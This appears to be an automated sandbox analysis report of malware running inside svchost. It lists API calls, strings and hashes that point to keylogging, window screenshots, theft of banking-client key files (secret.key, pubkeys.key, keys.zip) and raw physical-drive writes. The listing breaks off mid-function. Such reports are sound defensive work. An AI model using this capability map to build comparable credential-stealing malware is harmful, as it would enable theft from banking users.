                                                                                                                                                                                                            • API ID: FileHeap$Handle$Process$CharCloseCreateInformationMutexNamePathUpperstrstr$AllocateExistsFindFreeModulePrivateProfileReadReleaseSizeSleepStringValidateWritememset
                                                                                                                                                                                                            • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$interpro.ini
                                                                                                                                                                                                            • API String ID: 1392943061-1768425703
                                                                                                                                                                                                            • Opcode ID: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
                                                                                                                                                                                                            • Instruction ID: 36bb3138c4b6ac632d28e0c971c62c05d9625a71fc495c53c9344cf45005f770
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fd8be4243b616d36701170732b719105e80b8738c4a2baab95a9a0f829c0218
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F515C72D443955BEB228F28CC88BAA7BADEF84704F144698E58593241DB71F648CF51
                                                                                                                                                                                                            Function 02C7C069 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 171windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02C7C078
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C0BB
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 02C7C0CB
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C0E5
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(00000000,000000FA,?,?,?,755730D0), ref: 02C7C100
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(00000000,000000FB,0000003C,?,?,755730D0), ref: 02C7C12D
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7C165
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C168
                                                                                                                                                                                                            • IsIconic.USER32(00000000), ref: 02C7C087
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: PrintWindow.USER32(00000000,?,00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,755730D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                              • Part of subcall function 02C7B9D0: BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7C18E
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7C19D
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C1CE
                                                                                                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 02C7C1DB
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7C1F2
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(?,000000FA,0000003C,?,?,755730D0), ref: 02C7C21D
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(?,000000FB,0000003C,?,?,755730D0), ref: 02C7C255
                                                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 02C7C292
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C295
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                            • String ID: <$<
                                                                                                                                                                                                            • API String ID: 3463799249-213342407
                                                                                                                                                                                                            • Opcode ID: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
                                                                                                                                                                                                            • Instruction ID: b1d32d639a922d41fb39542d9b211e93deef972600654bc564f20758c79fc4a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 177739d8dc674bb14e83d376c842133f055ce4819bffd8eeb7c026f821d27920
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7613871D042299FDF15CFA8DC84BDEBBB9BF48714F14429AE419A7280DB706A41CF91
                                                                                                                                                                                                            Function 02C81B80 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 169memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81BB2
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                              • Part of subcall function 02C81AC0: HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02C81C15
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C1C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81C2F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02C81C3F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02C81C46
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02C83142,?,?,?,00000000), ref: 02C81C66
                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C6D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
                                                                                                                                                                                                            • String ID: [bks]$[del]$[ins]$[ret]$[tab]
                                                                                                                                                                                                            • API String ID: 4095246728-233650549
                                                                                                                                                                                                            • Opcode ID: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
                                                                                                                                                                                                            • Instruction ID: 7c5269ea7c08bc0399d571e4fe4db444f479d83ea25b64e7ed57dd8896304e30
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fe5b6ceba38fa2ef0e36c1ed7f9f926612c882d500b9cf1e6cc991abbf892d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6751B171D40259EBCB06DF68D844BEABBF4EF85704F08C69AE9599B340E7709605CFA0
                                                                                                                                                                                                            Function 02C92320 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C92337
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C92344
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C92394
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C923AC
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C923B5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02C923C5
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C921B0
                                                                                                                                                                                                              • Part of subcall function 02C92180: CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                              • Part of subcall function 02C92180: GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                              • Part of subcall function 02C92180: IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                              • Part of subcall function 02C92180: SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                              • Part of subcall function 02C92180: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(6D1DA6D0,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C923E6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA6D0$DefaultPrivateDir$General$STF$interpro.ini
                                                                                                                                                                                                            • API String ID: 2256374885-2198023928
                                                                                                                                                                                                            • Opcode ID: b66f6dc5e5c46e1dbcd552899d16f3e85ff613814c317f93073df216e5ed2817
                                                                                                                                                                                                            • Instruction ID: bd3d41e6ccc1ab58686192a431e20eef7b7d56b6ab04b4250f60db2969be4403
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b66f6dc5e5c46e1dbcd552899d16f3e85ff613814c317f93073df216e5ed2817
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B111B7B5980258AFEB11DB64DC88FD7777DEF94700F0087D5E94997140DAB09694CF50
                                                                                                                                                                                                            Function 02C82030 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,75569300), ref: 02C820FB
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateCurrentDirectoryDriveInformationTypeWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                            • API String ID: 1874144376-3292898883
                                                                                                                                                                                                            • Opcode ID: 3ee585f743a4ea84abc023b537e90a069510e70f219c765b8d1bfac83f861e4a
                                                                                                                                                                                                            • Instruction ID: 18f3149309e499d998e30ee7a0284b8f21fa454f41ee8954f8bd106cee32a35a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ee585f743a4ea84abc023b537e90a069510e70f219c765b8d1bfac83f861e4a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9321D671D81254A7E722E654DC4DBE9B3ACDF44719F208689FE44A60C0D7B45F848AA2
                                                                                                                                                                                                            Function 02C7C9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                            • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                            • API String ID: 776485234-1938657081
                                                                                                                                                                                                            • Opcode ID: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
                                                                                                                                                                                                            • Instruction ID: 4f281b4965ab4645f2a855e6039ddb837b837f02e4bdfe07565213358f8d337e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34c49a98c2f3da91a95aee6fd643c74d9e5d278e1fff4f1a5c1e83be57eb9a20
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A012D72ED02587DF22666E5AC47DF77B5CDF81A52F410776F84752040D9A05E00CAB2
                                                                                                                                                                                                            Function 02C9E6D0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • setsockopt.WS2_32(?,00000006,00000001,02C98817,00000004), ref: 02C9E737
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: setsockopt
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3981526788-0
                                                                                                                                                                                                            • Opcode ID: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
                                                                                                                                                                                                            • Instruction ID: 8809aeba94acb1b4cd9fd2406f2df005efe3646a09cd2de55401464d0af224d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c90b312789074b0205176c452a4f2296d311b816923bfb5513e3d95fbb56f09d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4519F70A00B01ABEB20CF79C888BD7B7F5EF85714F60895ED56E87280DB31A6019B50
                                                                                                                                                                                                            Function 02C91150 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C9116E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91193
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02C911A5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileModuleNamememset
                                                                                                                                                                                                            • String ID: \clmain.exe
                                                                                                                                                                                                            • API String ID: 350293641-582869414
                                                                                                                                                                                                            • Opcode ID: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
                                                                                                                                                                                                            • Instruction ID: 8612c5f56324f6a3a35b79f9aaee419075629bab937a1ab13b56e47f2d9977c4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07b77963ca84e51e3e4e4426c7f825cba2275471efa8de69b28ec33cb12ce073
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97F0AE719942086BEB54D6749C46BE573ACDB54705F0006D5EA4DC60C0E7F155D88A91
                                                                                                                                                                                                            Function 02C9C3DB Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C9C3F9
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C9C43E
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C9C4B2
                                                                                                                                                                                                            • free.MSVCRT ref: 02C9C4DF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2496910992-0
                                                                                                                                                                                                            • Opcode ID: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
                                                                                                                                                                                                            • Instruction ID: ddda68bf6b47aa3effb100a9642183e40d22baf30358de738433dca4d76275b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c72acc23544a2b183772906408102910aa18aa9b5e8c7a720d7394e280cae27
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC313A7270429E8FCF10CE98E8886FE7758EF5A354F1006A3E94587241D7318766CBA2
                                                                                                                                                                                                            Function 02C8F1B0 Relevance: 86.1, APIs: 42, Strings: 7, Instructions: 347memorysleepstringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F1D0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da230), ref: 02C8F1F7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F235
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8F23F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F247
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F259
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8F260
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8F29C
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8F2AA
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da230,?,?), ref: 02C8F2E5
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F31F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8F329
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F331
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F340
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8F347
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8F375
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8F3A0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F3EB
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02C8F405
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F448
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02C8F462
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,02CB854C,00000002), ref: 02C8F487
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F4CA
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02C8F4E4
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02C8F509
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C8F540
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F543
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F550
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F553
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02C8F562
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8F573
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8F57A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32 ref: 02C8F58E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8F5A0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02C8F5CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F5D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F5DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F5E0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02C8F5E9
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F5EC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F5FD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F600
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
                                                                                                                                                                                                            • String ID: 6d1da230$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                            • API String ID: 3271848171-3992485419
                                                                                                                                                                                                            • Opcode ID: e534e97740f12aed5e9c04bac7b4ab18669707fe01db89cb9ad0c100e8591fb1
                                                                                                                                                                                                            • Instruction ID: edd937d9dd211fdf14849e06959a517aaf84cf3747b41e19b0852adfee06e489
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e534e97740f12aed5e9c04bac7b4ab18669707fe01db89cb9ad0c100e8591fb1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06C13771A44385AFE722AF74DC49BAB7BE8EF85708F448A5CF54987140DB70D608CBA1
                                                                                                                                                                                                            Function 02C7F860 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02C7F8A1
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F8A4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F8BE
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02C7F8DE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F8FF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F902
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F917
